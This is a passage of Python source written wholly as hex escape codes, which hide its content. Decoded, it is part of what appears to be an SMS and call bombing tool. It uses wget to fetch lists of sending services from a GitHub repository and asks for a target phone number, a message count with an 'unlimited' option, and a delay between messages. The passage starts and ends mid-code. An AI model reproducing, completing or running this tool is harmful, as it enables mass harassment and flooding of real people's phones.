\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f
\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x32\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20
\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x53\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x57\x65\x6e\x74\x20\x57\x72\x6f\x6e\x67\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x34\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d
\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x22\x22\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x20\x7b\x30\x7d\x50\x52\x45\x53
\x53\x20\x7b\x36\x7d\x22\x7b\x34\x7d\x7b\x30\x7d\x51\x7b\x36\x7d\x22\x7b\x34\x7d\x20\x7b\x30\x7d\x52\x45\x54\x55\x52\x4e\x20\x54\x4f\x20\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x20\x7b\x35\x7d\x28\x7b\x32\x7d\x57\x69\x74\x68\x6f\x75\x74\x20\x2b\x7b\x35\x7d\x29\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x33\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x27\x2b\x27\x20\x69\x6e\x20\x63\x63\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x20\x3d\x20\x6c\x69\x73\x74\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x2e\x72\x65\x6d\x6f\x76\x65\x28\x27\x2b\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63
\x63\x20\x3d\x20\x27\x27\x2e\x6a\x6f\x69\x6e\x28\x74\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x63\x63\x2e\x73\x74\x72\x69\x70\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3e\x3d\x20\x34\x20\x6f\x72\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3c\x20\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x64\x70\x6e\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x54\x61\x72\x67\x65\x74\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x5c\x74\x5c\x74\x7b\x37\x7d\x7b\x30\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x20\x7b\x36\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x63\x63\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x70\x6e\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x72\x65\x6d\x73\x70\x28\x64\x70\x6e\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x70\x6e\x29\x20\x3c\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30
\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x66\x6f\x72\x20\x63\x63\x68\x20\x69\x6e\x20\x73\x74\x72\x28\x63\x63\x20\x2b\x20\x70\x6e\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6f\x74\x20\x63\x63\x68\x2e\x69\x73\x64\x69\x67\x69\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x4d\x75\x73\x74\x20\x43\x6f\x6e\x73\x69\x73\x74\x20\x4f\x66\x20\x4e\x75\x6d\x62\x65\x72\x73\x20\x4f\x6e\x6c\x79\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d
\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x7b\x35\x7d\x28\x7b\x33\x7d\x30\x20\x46\x6f\x72\x20\x55\x6e\x6c\x69\x6d\x69\x74\x65\x64\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c
\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x32\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x32\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x32\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45
\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x35\x20\x73\x65\x63\x7